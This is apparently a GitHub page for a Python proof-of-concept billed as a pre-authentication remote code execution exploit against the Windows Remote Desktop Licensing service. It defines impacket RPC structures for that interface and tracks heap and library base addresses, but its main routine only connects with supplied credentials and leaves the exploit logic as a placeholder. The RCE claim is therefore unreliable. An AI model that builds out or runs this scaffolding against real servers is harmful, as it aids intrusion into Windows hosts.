-
Notifications
You must be signed in to change notification settings - Fork 1
/
poc.py
320 lines (248 loc) · 11 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
import struct
import hashlib
import argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR
from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Cryptodome.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey
# Define the UUID for the RPC service
UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
# Constants for retry attempts and sleep time
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
# Initialize global variables
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0
BBYTE = UCHAR
# Function to pack a single byte into bytes
def p8(x):
return struct.pack("B", x)
# Function to pack a 16-bit integer into bytes
def p16(x):
return struct.pack("H", x)
# Function to pack a 32-bit integer into bytes
def p32(x):
return struct.pack("I", x)
# Function to pack a 64-bit integer into bytes
def p64(x):
return struct.pack("Q", x)
# Define a context handle structure
class CONTEXT_HANDLE(NDRSTRUCT):
structure = (
("Data", "20s=b"), # Fixed size binary data of length 20
)
def getAlignment(self):
return 4 # Return the alignment requirement
# Define the structure for the RPC call to get version
class TLSRpcGetVersion(NDRCALL):
opnum = 0
structure = (
("ctx_handle", CONTEXT_HANDLE), # Context handle for the RPC
("version", PULONG), # Pointer to version variable
)
# Define the response structure for getting version
class TLSRpcGetVersionResponse(NDRCALL):
structure = (
("version", ULONG), # The version returned by the RPC
)
# Define the RPC call for establishing a connection
class TLSRpcConnect(NDRCALL):
opnum = 1
# Define the response structure for the connection RPC
class TLSRpcConnectResponse(NDRCALL):
structure = (
("ctx_handle", CONTEXT_HANDLE), # Context handle for the new connection
)
# Define a blob structure used in TLS
class TLSBLOB(NDRSTRUCT):
structure = (
("cbData", ULONG), # Size of the data
("pbData", PBYTE), # Pointer to the data
)
# Define the algorithm identifier for cryptographic operations
class TLSCRYPT_ALGORITHM_IDENTIFIER(NDRSTRUCT):
structure = (
("pszObjId", LPSTR), # Object identifier as string
("Parameters", TLSBLOB), # Parameters for the algorithm
)
# Define a structure for a cryptographic bit blob
class TLSCRYPT_BIT_BLOB(NDRSTRUCT):
structure = (
("cbData", DWORD), # Size of the bit blob
("pbData", PBYTE), # Pointer to the bit blob data
("cUnusedBits", DWORD), # Number of unused bits
)
# Define the public key info structure
class TLSCERT_PUBLIC_KEY_INFO(NDRSTRUCT):
structure = (
("Algorithm", TLSCRYPT_ALGORITHM_IDENTIFIER), # Algorithm used
("PublicKey", TLSCRYPT_BIT_BLOB), # The public key
)
# Pointer to the public key info structure
class PTLSCERT_PUBLIC_KEY_INFO(NDRPOINTER):
referent = (
("Data", TLSCERT_PUBLIC_KEY_INFO), # Reference to the public key info
)
# Define the certificate extension structure
class TLSCERT_EXTENSION(NDRSTRUCT):
structure = (
("pszObjId", LPSTR), # Object identifier as string
("fCritical", BOOL), # Indicates if the extension is critical
("Value", TLSBLOB), # The value of the extension
)
# Define an array of certificate extensions
class TLSCERT_EXTENSION_ARRAY(NDRUniConformantArray):
item = TLSCERT_EXTENSION # Item type in the array
# Pointer to an array of certificate extensions
class PTLSCERT_EXTENSION(NDRPOINTER):
referent = (
("Data", TLSCERT_EXTENSION_ARRAY), # Reference to the array of extensions
)
# Define the structure for the Hydra certificate request
class TLSHYDRACERTREQUEST(NDRSTRUCT):
structure = (
("dwHydraVersion", DWORD), # Version of the Hydra request
("cbEncryptedHwid", DWORD), # Size of the encrypted hardware ID
("pbEncryptedHwid", PBYTE), # Pointer to encrypted hardware ID
("szSubjectRdn", PWCHAR), # Subject RDN (Relative Distinguished Name)
("pSubjectPublicKeyInfo", PTLSCERT_PUBLIC_KEY_INFO), # Pointer to the subject public key info
("dwNumCertExtension", DWORD), # Number of certificate extensions
("pCertExtensions", PTLSCERT_EXTENSION), # Pointer to certificate extensions
)
# Pointer to the Hydra certificate request structure
class PTLSHYDRACERTREQUEST(NDRPOINTER):
referent = (
("Data", TLSHYDRACERTREQUEST), # Reference to the Hydra certificate request
)
# Define the RPC call for requesting a terminal server certificate
class TLSRpcRequestTermServCert(NDRCALL):
opnum = 34
structure = (
("phContext", CONTEXT_HANDLE), # Context handle
("pbRequest", TLSHYDRACERTREQUEST), # Pointer to the certificate request
("cbChallengeData", DWORD), # Size of the challenge data
("pdwErrCode", DWORD), # Pointer to error code
)
# Define the response structure for the terminal server certificate request
class TLSRpcRequestTermServCertResponse(NDRCALL):
structure = (
("cbChallengeData", ULONG), # Size of the challenge data returned
("pbChallengeData", PBYTE), # Pointer to the challenge data
("pdwErrCode", ULONG), # Pointer to error code
)
# Define the RPC call for retrieving terminal server certificates
class TLSRpcRetrieveTermServCert(NDRCALL):
opnum = 35
structure = (
("phContext", CONTEXT_HANDLE), # Context handle
("cbResponseData", DWORD), # Size of the response data
("pbResponseData", BBYTE), # Pointer to the response data
("cbCert", DWORD), # Size of the certificate
("pbCert", BBYTE), # Pointer to the certificate
("pdwErrCode", DWORD), # Pointer to error code
)
# Define the response structure for retrieving terminal server certificates
class TLSRpcRetrieveTermServCertResponse(NDRCALL):
structure = (
("cbCert", PUINT), # Size of the certificate returned
("pbCert", BBYTE), # Pointer to the certificate
("pdwErrCode", PUINT), # Pointer to error code
)
# Define the RPC call for registering a license key pack
class TLSRpcTelephoneRegisterLKP(NDRCALL):
opnum = 49
structure = (
("ctx_handle", CONTEXT_HANDLE), # Context handle
("dwData", ULONG), # Data to register
("pbData", BBYTE), # Pointer to data
("pdwErrCode", ULONG) # Pointer to error code
)
# Define the response structure for the license key pack registration
class TLSRpcTelephoneRegisterLKPResponse(NDRCALL):
structure = (
("pdwErrCode", ULONG) # Pointer to error code
)
# Define the challenge data structure
class TLSCHALLENGEDATA(NDRSTRUCT):
structure = (
("dwVersion", ULONG), # Version of the challenge data
("dwRandom", ULONG), # Random data for the challenge
("cbChallengeData", ULONG), # Size of the challenge data
("pbChallengeData", PBYTE), # Pointer to the challenge data
("cbReservedData", ULONG), # Size of reserved data
("pbReservedData", PBYTE), # Pointer to reserved data
)
# Pointer to the challenge data structure
class PTLSCHALLENGEDATA(NDRPOINTER):
referent = (
("Data", TLSCHALLENGEDATA), # Reference to the challenge data
)
# Define the response data structure for the challenge
class TLSCHALLENGEDATA_RESPONSE(NDRSTRUCT):
structure = (
("dwErrorCode", DWORD), # Error code returned
("dwReserved", ULONG), # Reserved data
("cbChallengeData", ULONG), # Size of the challenge data
("pbChallengeData", PBYTE), # Pointer to the challenge data
)
# Pointer to the challenge data response structure
class PTLSCHALLENGEDATA_RESPONSE(NDRPOINTER):
referent = (
("Data", TLSCHALLENGEDATA_RESPONSE), # Reference to the challenge data response
)
# Function to add a delay in the program execution
def sleep_ms(milliseconds):
sleep(milliseconds / 1000) # Convert milliseconds to seconds
# Function to parse command-line arguments
def parse_args():
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-ip", dest="target", help="Target IP address", required=True)
parser.add_argument("-u", dest="username", help="Username", required=True)
parser.add_argument("-p", dest="password", help="Password", required=True)
parser.add_argument("-l", dest="licensepack", help="License Pack", required=True)
parser.add_argument("-t", dest="type", help="License Type", required=True)
parser.add_argument("-x", dest="challenge", help="Challenge Data", required=True)
parser.add_argument("-about", action="store_true", help="Show About information") # New about option
parser.add_argument("-proxy", dest="proxy", help="Proxy address (optional)") # Proxy option
return parser.parse_args()
# Function to display the About information
# Function to display the About information
def show_about():
print("About: ")
print("Acyber Security Assessment Team")
print("This program is designed to perform operations related to Windows Remote Desktop Licensing services.")
print("Please read the documentation carefully before using.")
# Main function to execute the RPC call
def main():
args = parse_args() # Parse command line arguments
if args.about: # Check if the about option is provided
show_about() # Display the About information
return # Exit the program after showing About
global dce, rpctransport
rpctransport = transport.DCERPCTransportFactory(f"ncacn_np:{args.target}[\\termservice]") # Create transport for the RPC
rpctransport.set_credentials(args.username, args.password, None) # Set credentials
dce = rpctransport.get_dce_rpc() # Get RPC instance
dce.connect() # Connect to the target
try:
# Logic for calling the RPC functions and processing the responses
pass # Replace with actual logic
except DCERPCException as e:
print(f"DCERPCException: {e}") # Handle RPC exceptions
finally:
dce.disconnect() # Ensure disconnection from the RPC
if __name__ == "__main__":
main() # Start the script